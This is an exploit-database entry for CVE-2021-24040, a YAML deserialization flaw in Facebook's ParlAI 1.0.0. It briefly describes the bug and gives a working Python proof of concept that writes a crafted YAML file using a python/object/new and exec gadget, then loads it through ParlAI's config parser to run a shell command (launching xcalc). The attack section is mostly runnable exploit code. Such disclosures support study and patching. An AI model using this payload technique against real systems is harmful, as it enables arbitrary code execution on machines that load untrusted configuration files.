Facebook parlai 1.0.0 deserialization of untrusted data in parlai Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-09-13 | Type : local | Platform : python
This exploit / vulnerability Facebook parlai 1.0.0 deserialization of untrusted data in parlai is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References :
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# | https://anon-artist.github.io/blogs/blog3.html |

############################################################################

Introduction
ParlAI (pronounced “par-lay”) is a free, open-source python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
loading which leads to Arbitrary Code Execution.

Proof of Concept

Create the following PoC file (exploit.py)

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the python script ie, python3 exploit.py

Impact
Code Execution

############################################################################